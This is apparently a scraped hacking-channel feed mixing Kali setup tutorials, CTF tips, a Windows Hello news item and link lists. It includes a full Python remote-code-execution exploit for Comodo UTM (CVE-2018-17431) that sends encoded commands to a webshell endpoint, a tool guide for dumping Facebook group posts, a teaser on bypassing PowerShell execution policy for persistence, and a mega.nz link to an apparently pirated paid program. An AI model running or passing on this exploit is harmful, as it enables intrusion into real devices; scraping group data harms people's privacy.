New Categories & Speed improuvement added to Undercodenews.com

New technique, how to scientifically identify fake photos with "no PS traces"?
#Updates
_

Detailed fresh Proxies List

https://pastebin.com/9BfWcBUV

BE AWARE FROM NEW CVE IN Mida Framework 2.9.0
#Vulnerabilities
_

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐉 How to Install Atom Text Editor on Kali Linux 2020.x ?

Key features of the Atom text editor

-Cross-platform editing: works on Windows, Linux and macOS

-Has a built-in package manager: easily find and install packages to extend Atom capabilities.

-Smart AutoComplete: Write and edit code faster with smart and flexible autocomplete.

-File System Browser: Easily view and open a single file, an entire project, or multiple projects in one window.

--Highly Customizable: Customize the look and feel of your user interface with CSS / Less and add basic functionality with HTML and JavaScript.

-Provides Multiple Panels: Split the Atom interface into multiple panels for comparing and editing code between files

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

Installing Atom Text Editor on Kali Linux
Add the official Atom package repository to your system by running the following command.

1) sudo apt update

2) sudo apt -y install wget gpg

3) sudo sh -c 'echo "deb [arch=amd64] https://packagecloud.io/AtomEditor/atom/any/ any main" > /etc/apt/sources.list.d/atom.list'

4) The repository content will be stored in a file:

$ cat /etc/apt/sources.list.d/atom.list
deb [arch=amd64] https://packagecloud.io/AtomEditor/atom/any/ any main

5) Import the GPG key:
wget -qO - https://packagecloud.io/AtomEditor/atom/gpgkey | sudo apt-key add -

6) Then update apt and install the Atom text editor on your Kali Linux machine:

sudo apt update
sudo apt install atom

7) Accept the installation prompt with the y key:


@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Baidu veteran Shi Youcai was taken away by the police
#international
_

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 update dump informations from any facebook group :


🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) https://github.com/kevinzg/facebook-scraper

2) cd facebook-scraper

3) pip install facebook-scraper

4) Send the unique page name as the first parameter and you're good to go:

>>> from facebook_scraper import get_posts

>>> for post in get_posts('nintendo', pages=1):
... print(post['text'][:50])
...

5) The final step on the road to the Super Smash Bros
We’re headed to PAX East 3/28-3/31 with new games
CLI usage

$ facebook-scraper --filename nintendo_page_posts.csv --pages 1 nintendo
Use

$ facebook-scraper --help

Optional parameters

group: group id, to scrape groups instead of pages. Default is None.

pages: how many pages of posts to request, usually the first page has 2 posts and the rest 4. Default is 10.

timeout: how many seconds to wait before timing out. Default is 5.

sleep: how many seconds to sleep between each request. Default is 0.

credentials: tuple of user and password to login before requesting the posts. Default is None.

extra_info: bool, if true the function will try to do an extra request to get the post reactions. Default is False.

youtube_dl: bool, use Youtube-DL for (high-quality) video extraction. You need to have youtube-dl installed on your environment. Default is False.

🦑Post example
{'post_id': '2257188721032235',
'text': 'Don’t let this diminutive version of the Hero of Time fool you, '
'Young Link is just as heroic as his fully grown version! Young Link '
'joins the Super Smash Bros. series of amiibo figures!',
'time': datetime.datetime(2019, 4, 29, 12, 0, 1),
'image': 'https://scontent.flim16-1.fna.fbcdn.net'
'/v/t1.0-0/cp0/e15/q65/p320x320'
'/58680860_2257182054366235_1985558733786185728_n.jpg'
'?_nc_cat=1&_nc_ht=scontent.flim16-1.fna'
'&oh=31b0ba32ec7886e95a5478c479ba1d38&oe=5D6CDEE4',
'likes': 2036,
'comments': 214,
'shares': 0,
'reactions': {'like': 135, 'love': 64, 'haha': 10, 'wow': 4, 'anger': 1}, # if extra_info was set
'post_url': 'https://m.facebook.com/story.php'
'?story_fbid=2257188721032235&id=119240841493711',
'link': 'https://bit.ly/something'}

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑THIS IS THE LASTEST COMODO EXPLOIT :
(patched now)

# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
=# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8

import requests

def RndInt(Lenght):
from random import choice
from string import digits

RandonInt = ''.join([choice(digits) for n in range(Lenght)])
return str(RandonInt)

if name == "main":

IP = input("IP: ")
Port = input("Port: ")

Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
'''For more info about command try to read manual of spesefic version of Comodo UTM and
exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
'''

BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
BaseNComdURL = BaseURL + "&k=" + Command
LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13)
FullURL = BaseNComdURL + LastPart
AddetionalEnter = BaseURL + "&k=%0a" + LastPart

try:
FirstResponse = requests.get(FullURL).text
except:
print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
exit(1)

SecondResponse = requests.get(AddetionalEnter).text
if SecondResponse.find("Configuration has been altered") == -1:
print("\nExploit Failed!\n")
exit(1)
else:
print("\nOK! Command Ran!\n")
exit(0)

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is Capture the Flag - CTF ?
#FastTips

-CTF’s (capture the flag) are computer security/hacking competitions which generally consist of participants breaking, investigating, reverse engineering and doing anything they can to reach the end goal, a “flag” which is usually found as a string of text.


-DEF CON hosts what is the most widely known and first major CTF, occuring annualy at the hacking conference in Las Vegas. Many different competitions have branched off since then, and numerous ones are available year round. One of the best places to see when CTFs are being scheduled is ctftime, an active website with calendars and team rankings.

wiki source
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Finding a CTF :

If you ever wanted to start running, you were probably encouraged to sign up to a 5k to keep focused on a goal. The same principle applies here: pick a CTF in the near future that you want to compete in and come up with a practice schedule. Here are some CTFs that we can recommend:


1) PicoCTF and PlaidCTF by CMU

2) HSCTF is made for high school students

3) Ghost in the Shellcode (GitS)

4) CSAW CTF by NYU-Poly

5) UCSB iCTF is for academics only

6) Defcon CTF

#fastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

According to Microsoft, the execution policy is part of the security strategy of PowerShell. It determines whether you can load conguration les (including your PowerShell prole) and run scripts, and it determines which scripts, if any, must be digitally signed before they will run. It should be noted that Microsoft has gone on record saying that the ExecutionPolicy was never intended to be a security control.
In order to change the PowerShell Execution Policy you have to start PowerShell as an administrator and run the following command Set-ExecutionPolicy ExecutionPolicy RemoteSigned. You can also set the RemoteSigned to unrestricted, but it is discouraged by Microsoft.
Alright, but what if you are not an administrator yet? You have basic low privilege access to a Windows machine, and you need to upgrade your shell to something more stable, or to add some Empire persistence. How can you change the ExecutionPolicy?

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🖧 How to install and connect OpenVPN client on Debian-kali 2020-parrot ?

1) Installing the OpenVPN Client
OpenVPN packages are available in the default Debian repositories.

2) Open a terminal on your Debian system and update the apt cache.

3) After that, install the OpenVPN package.

4) Open a terminal and run the commands to install the openvpn client on Debian:

sudo apt update

sudo apt install openvpn -y

5) Connect to OpenVPN Server
Copy the openvpn client config file to your Debian machine.

6) You can use the –config command line parameter to provide a configuration file.

7) The command will read all the necessary data to create a vpn from this file.

8) Let's run the following command to connect to the openvpn server:

openvpn --config client.ovpn
You should see the following output:

9) Thu Sep 10 12:04:18 2020 TCP / UDP: Preserving recently used remote address: [AF_INET] 69.87.218.145:1194
Thu Sep 10 12:04:18 2020 Socket Buffers: R = [212992-> 212992] S = [212992-> 212992]
Thu Sep 10 12:04:18 2020 UDP link local: (not bound)
Thu Sep 10 12:04:18 2020 UDP link remote: [AF_INET] 69.87.218.145:1194

Thu Sep 10 12:04:18 2020 TLS: Initial packet from [AF_INET] 69.87.218.145:1194, sid = 6d27e1cb 524bd8cd
Thu Sep 10 12:04:18 2020 VERIFY OK: depth = 1, CN = Easy-RSA CA
Thu Sep 10 12:04:18 2020 VERIFY OK: depth = 0, CN = tecadmin-server
Thu Sep 10 12:04:18 2020 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, 2048 bit RSA
Thu Sep 10 12:04:18 2020 [tecadmin-server] Peer Connection Initiated with [AF_INET] 69.87.218.145:1194
Thu Sep 10 12:04:19 2020 SENT CONTROL [tecadmin-server]: 'PUSH_REQUEST' (status = 1)
Thu Sep 10 12:04:19 2020 PUSH: Received control message: 'PUSH_REPLY, redirect-gateway def1, dhcp-option DNS 208.67.222.222, dhcp-option DNS 208.67.220.220, route 10.8.0.1, topology net30, ping 20, ping-restart 60, ifconfig 10.8.0.6 10.8.0.5, peer-id 0, cipher AES-256-GCM '
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: timers and / or timeouts modified
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: --ifconfig / up options modified
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: route options modified

10) Check the connection
After a successful connection, a new IP address will be assigned on the tun0 interface by the OpenVPN server.

11) You can check it with the following command:

ip a show tun0

🦑Output:

4: tun0: mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 100
    link / none 
    inet 10.8.0.6 peer 10.8.0.5/32 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80 :: 7226: 57b1: f101: 313b / 64 scope link stable-privacy 
       valid_lft forever preferred_lft forever
You can also check the OpenVPN server log to check the connection status:

12) the log file

tail -f /var/log/openvpn.log


@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

18TB hard drive spring is here, Western Red Disk and Purple Disk are upgraded at the same time
#Technologies
_

ERIC EDMEADES WILDFIT PROGRAM-90 DAYS CHALLENGE

https://mega.nz/folder/XQ9hCSZB#Vkc68jypUoV0puI35QZOXA

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🍌 Windows 10 update removes the need to remember passwords with Windows Hello and FIDO2:

1) Last fall, we learned that Windows aims to eliminate the need to remember passwords using Windows Hello, a biometrics-based technology.

2) This makes it a little easier that there is no need to keep somewhere a separate list of all the different passwords and password versions that you use.

3) Now achieving this goal is made even more realistic as Windows Hello has achieved FIDO2 certification, which allows biometrics and PINs to be treated as secure authenticators.

Say goodbye to passwords

4) Microsoft knows what everyone thinks about passwords, noting that "no one likes passwords (except hackers)."

5) Since the advent of the computer systems that we all use, we have had to remember passwords - for computer systems, websites, applications, devices, and the like.

“People don't like passwords because we have to remember them,” Microsoft explained.

"As a result, we often create passwords that are easy to guess — making them the first target for hackers trying to gain access to your computer or network."

6) The need for confidentiality meant passwords for everything.

This increased need has led to different types of passwords.

7) Instead of your birthday, anniversary, dog name, street name, etc., you were forced to remember more complex passwords or have a password manager.

8) These are the reasons that led the company to create Windows Hello last fall.

9) This biometrics-based technology used FIDO, which allowed Windows users to authenticate secure access using only fingerprints or facial recognition.

Windows Hello has now received FIDO2 certification, which adds acceptable standards for authentication.

10) This updated method now also includes the use of PINs.

11) The FIDO Alliance explained in a press release that “FIDO2 is a set of standards that enables easy and secure access to websites and applications using biometrics, mobile devices and / or FIDO security keys.

12) FIDO2's simplified login process is provided with robust cryptographic protection that far surpasses passwords, protecting users from phishing, all forms of password theft and replay attacks. ”

Windows 10x was recently announced.

13) Here you can see if these tools and the general list of Windows 10x options will be available

Windows Hello and FIDO2 integration
You can take advantage of Windows Hello with FIDO2 by updating Windows 10 to version 1903.

14) Microsoft Edge, Google Chrome and Mozilla Firefox will support biometrics and PINs.

Other Microsoft products such as Office 365, Skype, and Xbox Live can also authenticate using Windows Hello.

15) Will you be upgrading to Windows 10 to take advantage of Windows Hello and FIDO2 technologies?

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST TORRENTS APPS FOR ANDROID 2020 :

https://play.google.com/store/apps/details?id=com.bittorrent.bundle

https://play.google.com/store/apps/details?id=com.bittorrent.client&hl=en

https://play.google.com/store/apps/details?id=com.utorrent.client&hl=en

https://play.google.com/store/apps/details?id=hu.tagsoft.ttorrent.lite&hl=en

https://play.google.com/store/apps/details?id=com.mediaget.android&hl=en

https://play.google.com/store/apps/details?id=com.mobilityflow.torrent&hl=en

https://play.google.com/store/apps/details?id=com.delphicoder.flud

https://play.google.com/store/apps/details?id=intelligems.torrdroid

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁